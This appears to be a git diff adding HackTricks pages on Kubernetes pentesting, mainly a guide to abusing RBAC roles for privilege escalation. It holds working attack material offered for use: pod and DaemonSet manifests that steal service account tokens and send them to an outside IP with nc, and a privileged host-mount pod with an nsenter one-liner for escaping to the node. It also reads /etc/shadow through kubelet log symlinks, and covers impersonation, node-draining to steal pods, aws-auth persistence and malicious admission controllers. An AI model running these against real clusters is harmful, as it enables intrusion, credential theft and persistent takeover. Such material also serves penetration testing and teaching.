+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Kubernetes Basics
+
+If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes:
+
+{% content-ref url="kubernetes-basics.md" %}
+[kubernetes-basics.md](kubernetes-basics.md)
+{% endcontent-ref %}
+
+### Labs to practice and learn
+
+* [https://securekubernetes.com/](https://securekubernetes.com)
+* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
+
+## Hardening Kubernetes / Automatic Tools
+
+{% content-ref url="kubernetes-hardening/" %}
+[kubernetes-hardening](kubernetes-hardening/)
+{% endcontent-ref %}
+
+## Manual Kubernetes Pentest
+
+### From the Outside
+
+There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there.
+
+Depending on the configuration and your privileges you might be able to abuse that environment, for more information:
+
+{% content-ref url="pentesting-kubernetes-services/" %}
+[pentesting-kubernetes-services](pentesting-kubernetes-services/)
+{% endcontent-ref %}
+
+### Enumeration inside a Pod
+
+If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**:
+
+{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
+{% endcontent-ref %}
+
+### Enumerating Kubernetes with Credentials
+
+You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it:
+
+{% content-ref url="kubernetes-enumeration.md" %}
+[kubernetes-enumeration.md](kubernetes-enumeration.md)
+{% endcontent-ref %}
+
+Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here:
+
+{% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
+[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
+{% endcontent-ref %}
+
+#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with:
+
+{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+### Privesc to a different Namespace
+
+If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources:
+
+{% content-ref url="kubernetes-namespace-escalation.md" %}
+[kubernetes-namespace-escalation.md](kubernetes-namespace-escalation.md)
+{% endcontent-ref %}
+
+### From Kubernetes to the Cloud
+
+If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**.
+
+{% content-ref url="kubernetes-pivoting-to-clouds.md" %}
+[kubernetes-pivoting-to-clouds.md](kubernetes-pivoting-to-clouds.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
new file mode 100644
index 0000000000..20df0a56f5
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md
@@ -0,0 +1,715 @@
+# Abusing Roles/ClusterRoles in Kubernetes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+Here you can find some potentially dangerous Roles and ClusterRoles configurations.\
+Remember that you can get all the supported resources with `kubectl api-resources`
+
+## **Privilege Escalation**
+
+Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**:
+
+* Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
+* Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds
+* Be able to **read secrets** as the SAs tokens are stored as secrets
+* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
+* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
+
+### Access Any Resource or Verb (Wildcard)
+
+The **wildcard (\*) gives permission over any resource with any verb**. It's used by admins. Inside a ClusterRole this means that an attacker could abuse anynamespace in the cluster
+
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: api-resource-verbs-all
+rules:
+rules:
+- apiGroups: ["*"]
+  resources: ["*"]
+  verbs: ["*"]
+```
+
+### Access Any Resource with a specific verb
+
+In RBAC, certain permissions pose significant risks:
+
+1. **`create`:** Grants the ability to create any cluster resource, risking privilege escalation.
+2. **`list`:** Allows listing all resources, potentially leaking sensitive data.
+3. **`get`:** Permits accessing secrets from service accounts, posing a security threat.
+
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: api-resource-verbs-all
+rules:
+rules:
+- apiGroups: ["*"]
+  resources: ["*"]
+  verbs: ["create", "list", "get"]
+```
+
+### Pod Create - Steal Token
+
+An atacker with the permissions to create a pod, could attach a privileged Service Account into the pod and steal the token to impersonate the Service Account. Effectively escalating privileges to it
+
+Example of a pod that will steal the token of the `bootstrap-signer` service account and send it to the attacker:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: alpine
+  namespace: kube-system
+spec:
+  containers:
+  - name: alpine
+    image: alpine
+    command: ["/bin/sh"]
+    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
+  serviceAccountName: bootstrap-signer
+  automountServiceAccountToken: true
+  hostNetwork: true
+```
+
+### Pod Create & Escape
+
+The following indicates all the privileges a container can have:
+
+* **Privileged access** (disabling protections and setting capabilities)
+* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges
+* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks
+* **Mount hosts / inside the container**
+
+{% code title="super_privs.yaml" %}
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: ubuntu
+  labels:
+    app: ubuntu
+spec:
+  # Uncomment and specify a specific node you want to debug
+  # nodeName: <insert-node-name-here>
+  containers:
+  - image: ubuntu
+    command:
+      - "sleep"
+      - "3600" # adjust this as needed -- use only as long as you need
+    imagePullPolicy: IfNotPresent
+    name: ubuntu
+    securityContext:
+      allowPrivilegeEscalation: true
+      privileged: true
+      #capabilities:
+      #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
+      runAsUser: 0 # run as root (or any other user)
+    volumeMounts:
+    - mountPath: /host
+      name: host-volume
+  restartPolicy: Never # we want to be intentional about running this pod
+  hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
+  hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
+  hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
+  volumes:
+  - name: host-volume
+    hostPath:
+      path: /
+```
+{% endcode %}
+
+Create the pod with:
+
+```bash
+kubectl --token $token create -f mount_root.yaml
+```
+
+One-liner from [this tweet](https://twitter.com/mauilion/status/1129468485480751104) and with some additions:
+
+```bash
+kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
+```
+
+Now that you can escape to the node check post-exploitation techniques in:
+
+#### Stealth
+
+You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template:
+
+* **Privileged + hostPID**
+* **Privileged only**
+* **hostPath**
+* **hostPID**
+* **hostNetwork**
+* **hostIPC**
+
+_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)
+
+### Pod Create - Move to cloud
+
+If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\
+Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance.
+
+For more information check:
+
+{% content-ref url="pod-escape-privileges.md" %}
+[pod-escape-privileges.md](pod-escape-privileges.md)
+{% endcontent-ref %}
+
+### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
+
+It's possible to abouse these permissions to **create a new pod** and estalae privileges like in the previous example.
+
+The following yaml **creates a daemonset and exfiltrates the token of the SA** inside the pod:
+
+```yaml
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: alpine
+  namespace: kube-system
+spec:
+  selector:
+    matchLabels:
+      name: alpine
+  template:
+    metadata:
+      labels:
+        name: alpine
+    spec:
+      serviceAccountName: bootstrap-signer
+      automountServiceAccountToken: true
+      hostNetwork: true
+      containers:
+      - name: alpine
+        image: alpine
+        command: ["/bin/sh"]
+        args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
+        volumeMounts:
+        - mountPath: /root
+          name: mount-node-root
+      volumes:
+      - name: mount-node-root
+        hostPath:
+          path: /
+```
+
+### **Pods Exec**
+
+**`pods/exec`** is a resource in kubernetes used for **running commands in a shell inside a pod**. This allows to **run commands inside the containers or get a shell inside**.
+
+Therfore, it's possible to **get inside a pod and steal the token of the SA**, or enter a privileged pod, escape to the node, and steal all the tokens of the pods in the node and (ab)use the node:
+
+```bash
+kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
+```
+
+### port-forward
+
+This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod:
+
+```
+kubectl port-forward pod/mypod 5000:5000
+```
+
+### Hosts Writable /var/log/ Escape
+
+As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html), if you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\
+This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs <pod>`), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\
+The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**.
+
+Therefore, an attacker with **access to write in the /var/log/ folder** of the container could abuse this behaviours in 2 ways:
+
+* Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing:
+
+```bash
+kubectl logs escaper
+failed to get parse function: unsupported log format: "root::::::::\n"
+kubectl logs escaper --tail=2
+failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n"
+# Keep incrementing tail to exfiltrate the whole file
+```
+
+* If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://<gateway>:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files).
+
+```bash
+curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'
+<a href="bin">bin</a>
+<a href="data/">data/</a>
+<a href="dev/">dev/</a>
+<a href="etc/">etc/</a>
+<a href="home/">home/</a>
+<a href="init">init</a>
+<a href="lib">lib</a>
+[...]
+```
+
+**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts)
+
+#### Bypassing readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>
+
+If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:
+
+```bash
+mount -o rw,remount /hostlogs/
+```
+
+#### Bypassing hostPath readOnly protection <a href="#bypassing-hostpath-readonly-protection" id="bypassing-hostpath-readonly-protection"></a>
+
+As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it’s possible to bypass the protection:
+
+```yaml
+allowedHostPaths:
+    - pathPrefix: "/foo"
+       readOnly: true
+```
+
+Which was meant to prevent escapes like the previous ones by, instead of using a a hostPath mount, use a PersistentVolume and a PersistentVolumeClaim to mount a hosts folder in the container with writable access:
+
+```yaml
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+    name: task-pv-volume-vol
+    labels:
+      type: local
+spec:
+    storageClassName: manual
+    capacity:
+      storage: 10Gi
+    accessModes:
+      - ReadWriteOnce
+    hostPath:
+      path: "/var/log"
+---
+apiVersion: v1
+kind: PersistentVolumeClaim
+metadata:
+    name: task-pv-claim-vol
+spec:
+    storageClassName: manual
+    accessModes:
+      - ReadWriteOnce
+    resources:
+      requests:
+        storage: 3Gi
+---
+apiVersion: v1
+kind: Pod
+metadata:
+    name: task-pv-pod
+spec:
+    volumes:
+      - name: task-pv-storage-vol
+        persistentVolumeClaim:
+          claimName: task-pv-claim-vol
+    containers:
+      - name: task-pv-container
+        image: ubuntu:latest
+        command: [ "sh", "-c", "sleep 1h" ]
+        volumeMounts:
+          - mountPath: "/hostlogs"
+            name: task-pv-storage-vol
+```
+
+### **Impersonating privileged accounts**
+
+With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.
+
+Just use the parameter `--as=<username>` in the `kubectl` command to impersonate a user, or `--as-group=<group>` to impersonate a group:
+
+```bash
+kubectl get pods --as=system:serviceaccount:kube-system:default
+kubectl get secrets --as=null --as-group=system:masters
+```
+
+Or use the REST API:
+
+```bash
+curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \
+-H "Impersonate-Group: system:masters"\ 
+-H "Impersonate-User: null" \
+-H "Accept: application/json" \
+https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
+```
+
+### Listing Secrets
+
+The permission to **list secrets could allow an attacker to actually read the secrets** accessing the REST API endpoint:
+
+```bash
+curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
+```
+
+### Reading a secret – brute-forcing token IDs
+
+While an attacker in possession of a token with read permissions requires the exact name of the secret to use it, unlike the broader _**listing secrets**_ privilege, there are still vulnerabilities. Default service accounts in the system can be enumerated, each associated with a secret. These secrets have a name structure: a static prefix followed by a random five-character alphanumeric token (excluding certain characters) according to the [source code](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83).
+
+The token is generated from a limited 27-character set (`bcdfghjklmnpqrstvwxz2456789`), rather than the full alphanumeric range. This limitation reduces the total possible combinations to 14,348,907 (27^5). Consequently, an attacker could feasibly execute a brute-force attack to deduce the token in a matter of hours, potentially leading to privilege escalation by accessing sensitive service accounts.
+
+### Certificate Signing Requests
+
+If you have the verbs **`create`** in the resource `certificatesigningrequests` ( or at least in `certificatesigningrequests/nodeClient`). You can **create** a new CeSR of a **new node.**
+
+According to the [documentation it's possible to auto approve this requests](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/), so in that case you **don't need extra permissions**. If not, you would need to be able to approve the request, which means update in `certificatesigningrequests/approval` and `approve` in `signers` with resourceName `<signerNameDomain>/<signerNamePath>` or `<signerNameDomain>/*`
+
+An **example of a role** with all the required permissions is:
+
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: csr-approver
+rules:
+- apiGroups:
+  - certificates.k8s.io
+  resources:
+  - certificatesigningrequests
+  verbs:
+  - get
+  - list
+  - watch
+  - create
+- apiGroups:
+  - certificates.k8s.io
+  resources:
+  - certificatesigningrequests/approval
+  verbs:
+  - update
+- apiGroups:
+  - certificates.k8s.io
+  resources:
+  - signers
+  resourceNames:
+  - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
+  verbs:
+  - approve
+```
+
+So, with the new node CSR approved, you can **abuse** the special permissions of nodes to **steal secrets** and **escalate privileges**.
+
+In [**this post**](https://www.4armed.com/blog/hacking-kubelet-on-gke/) and [**this one**](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/) the GKE K8s TLS Bootstrap configuration is configured with **automatic signing** and it's abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets.\
+If you **have the mentioned privileges yo could do the same thing**. Note that the first example bypasses the error preventing a new node to access secrets inside containers because a **node can only access the secrets of containers mounted on it.**
+
+The way to bypass this is just to **create a node credentials for the node name where the container with the interesting secrets is mounted** (but just check how to do it in the first post):
+
+```bash
+"/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73b1-8cj1"
+```
+
+### AWS EKS aws-auth configmaps
+
+Principals that can modify **`configmaps`** in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the **aws-auth** configmap.\
+The verbs needed are **`update`** and **`patch`**, or **`create`** if configmap wasn't created:
+
+{% code overflow="wrap" %}
+```bash
+# Check if config map exists
+get configmap aws-auth -n kube-system -o yaml
+
+## Yaml example
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: aws-auth
+  namespace: kube-system
+data:
+  mapRoles: |
+    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
+      username: system:node:{{EC2PrivateDNSName}}
+      groups:
+        - system:masters
+
+# Create donfig map is doesn't exist
+## Using kubectl and the previous yaml
+kubectl apply -f /tmp/aws-auth.yaml
+## Using eksctl
+eksctl create iamidentitymapping --cluster Testing --region us-east-1 --arn arn:aws:iam::123456789098:role/SomeRoleTestName --group "system:masters" --no-duplicate-arns
+
+# Modify it
+kubectl edit -n kube-system configmap/aws-auth
+## You can modify it to even give access to users from other accounts
+data:
+  mapRoles: |
+    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
+      username: system:node:{{EC2PrivateDNSName}}
+      groups:
+        - system:masters
+  mapUsers: |
+    - userarn: arn:aws:iam::098765432123:user/SomeUserTestName
+      username: admin
+      groups:
+        - system:masters
+```
+{% endcode %}
+
+{% hint style="warning" %}
+You can use **`aws-auth`** for **persistence** giving access to users from **other accounts**.
+
+However, `aws --profile other_account eks update-kubeconfig --name <cluster-name>` **doesn't work from a different acount**. But actually `aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing` works if you put the ARN of the cluster instead of just the name.\
+To make `kubectl` work, just make sure to **configure** the **victims kubeconfig** and in the aws exec args add `--profile other_account_role` so kubectl will be using the others account profile to get the token and contact AWS.
+{% endhint %}
+
+### Escalating in GKE
+
+There are **2 ways to assign K8s permissions to GCP principals**. In any case the principal also needs the permission **`container.clusters.get`** to be able to gather credentials to access the cluster, or you will need to **generate your own kubectl config file** (follow the next link).
+
+{% hint style="warning" %}
+When talking to the K8s api endpoint, the **GCP auth token will be sent**. Then, GCP, through the K8s api endpoint, will first **check if the principal** (by email) **has any access inside the cluster**, then it will check if it has **any access via GCP IAM**.\
+If **any** of those are **true**, he will be **responded**. If **not** an **error** suggesting to give **permissions via GCP IAM** will be given.
+{% endhint %}
+
+Then, the first method is using **GCP IAM**, the K8s permissions have their **equivalent GCP IAM permissions**, and if the principal have it, it will be able to use it.
+
+{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md" %}
+[gcp-container-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
+{% endcontent-ref %}
+
+The second method is **assigning K8s permissions inside the cluster** to the identifying the user by its **email** (GCP service accounts included).
+
+### Create serviceaccounts token
+
+Principals that can **create TokenRequests** (`serviceaccounts/token`) When talking to the K8s api endpoint SAs (info from [**here**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/token_request.rego)).
+
+### ephemeralcontainers
+
+Principals that can **`update`** or **`patch`** **`pods/ephemeralcontainers`** can gain **code execution on other pods**, and potentially **break out** to their node by adding an ephemeral container with a privileged securityContext
+
+### ValidatingWebhookConfigurations or MutatingWebhookConfigurations
+
+Principals with any of the verbs `create`, `update` or `patch` over `validatingwebhookconfigurations` or `mutatingwebhookconfigurations` might be able to **create one of such webhookconfigurations** in order to be able to **escalate privileges**.
+
+For a [`mutatingwebhookconfigurations` example check this section of this post](./#malicious-admission-controller).
+
+### Escalate
+
+As you can read in the next section: [**Built-in Privileged Escalation Prevention**](./#built-in-privileged-escalation-prevention), a principal cannot update neither create roles or clusterroles without having himself those new permissions. Except if he has the **verb `escalate`** over **`roles`** or **`clusterroles`.**\
+Then he can update/create new roles, clusterroles with better permissions than the ones he has.
+
+### Nodes proxy
+
+Principals with access to the **`nodes/proxy`** subresource can **execute code on pods** via the Kubelet API (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/nodes_proxy.rego)). More information about Kubelet authentication in this page:
+
+{% content-ref url="../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md" %}
+[kubelet-authentication-and-authorization.md](../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md)
+{% endcontent-ref %}
+
+You have an example of how to get [**RCE talking authorized to a Kubelet API here**](../pentesting-kubernetes-services/#kubelet-rce).
+
+### Delete pods + unschedulable nodes
+
+Principals that can **delete pods** (`delete` verb over `pods` resource), or **evict pods** (`create` verb over `pods/eviction` resource), or **change pod status** (access to `pods/status`) and can **make other nodes unschedulable** (access to `nodes/status`) or **delete nodes** (`delete` verb over `nodes` resource) and has control over a pod, could **steal pods from other nodes** so they are **executed** in the **compromised** **node** and the attacker can **steal the tokens** from those pods.
+
+{% code overflow="wrap" %}
+```bash
+patch_node_capacity(){
+    curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]'
+}
+
+while true; do patch_node_capacity <id_other_node>; done &
+#Launch previous line with all the nodes you need to attack
+
+kubectl delete pods -n kube-system <privileged_pod_name>
+```
+{% endcode %}
+
+### Services status (CVE-2020-8554)
+
+Principals that can **modify** **`services/status`** may set the `status.loadBalancer.ingress.ip` field to exploit the **unfixed CVE-2020-8554** and launch **MiTM attacks against the clus**ter. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/modify_service_status_cve_2020_8554.rego)).
+
+### Nodes and Pods status
+
+Principals with **`update`** or **`patch`** permissions over `nodes/status` or `pods/status`, could modify labels to affect scheduling constraints enforced.
+
+## Built-in Privileged Escalation Prevention
+
+Kubernetes has a [built-in mechanism](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) to prevent privilege escalation.
+
+This system ensures that **users cannot elevate their privileges by modifying roles or role bindings**. The enforcement of this rule occurs at the API level, providing a safeguard even when the RBAC authorizer is inactive.
+
+The rule stipulates that a **user can only create or update a role if they possess all the permissions the role comprises**. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.
+
+{% hint style="warning" %}
+There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself.
+{% endhint %}
+
+### **Get & Patch RoleBindings/ClusterRoleBindings**
+
+{% hint style="danger" %}
+**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.**
+{% endhint %}
+
+The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.**
+
+## Other Attacks
+
+### Sidecar proxy app
+
+By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
+
+#### Create a sidecar proxy app <a href="#create-a-sidecar-proxy-app" id="create-a-sidecar-proxy-app"></a>
+
+Create your .yaml
+
+```bash
+kubectl run app --image=bash --command -oyaml --dry-run=client > <appName.yaml> -- sh -c 'ping google.com'
+```
+
+Edit your .yaml and add the uncomment lines:
+
+```yaml
+#apiVersion: v1
+#kind: Pod
+#metadata:
+#  name: security-context-demo
+#spec:
+#  securityContext:
+#    runAsUser: 1000
+#    runAsGroup: 3000
+#    fsGroup: 2000
+#  volumes:
+#  - name: sec-ctx-vol
+#    emptyDir: {}
+#  containers:
+#  - name: sec-ctx-demo
+#    image: busybox
+    command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ]
+    securityContext:
+      capabilities:
+        add: ["NET_ADMIN"]
+ #   volumeMounts:
+ #   - name: sec-ctx-vol
+ #     mountPath: /data/demo
+ #   securityContext:
+ #     allowPrivilegeEscalation: true
+```
+
+See the logs of the proxy:
+
+```bash
+kubectl logs app -C proxy
+```
+
+More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+
+### Malicious Admission Controller
+
+An admission controller **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**.
+
+If an attacker somehow manages to **inject a Mutationg Admission Controller**, he will be able to **modify already authenticated requests**. Being able to potentially privesc, and more usually persist in the cluster.
+
+**Example from** [**https://blog.rewanthtammana.com/creating-malicious-admission-controllers**](https://blog.rewanthtammana.com/creating-malicious-admission-controllers):
+
+```bash
+git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
+cd malicious-admission-controller-webhook-demo
+./deploy.sh
+kubectl get po -n webhook-demo -w
+```
+
+Check the status to see if it's ready:
+
+```bash
+kubectl get mutatingwebhookconfigurations
+kubectl get deploy,svc -n webhook-demo
+```
+
+![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format\&format=webp)
+
+Then deploy a new pod:
+
+```bash
+kubectl run nginx --image nginx
+kubectl get po -w
+```
+
+When you can see `ErrImagePull` error, check the image name with either of the queries:
+
+```bash
+kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'
+kubectl describe po nginx | grep "Image: "
+```
+
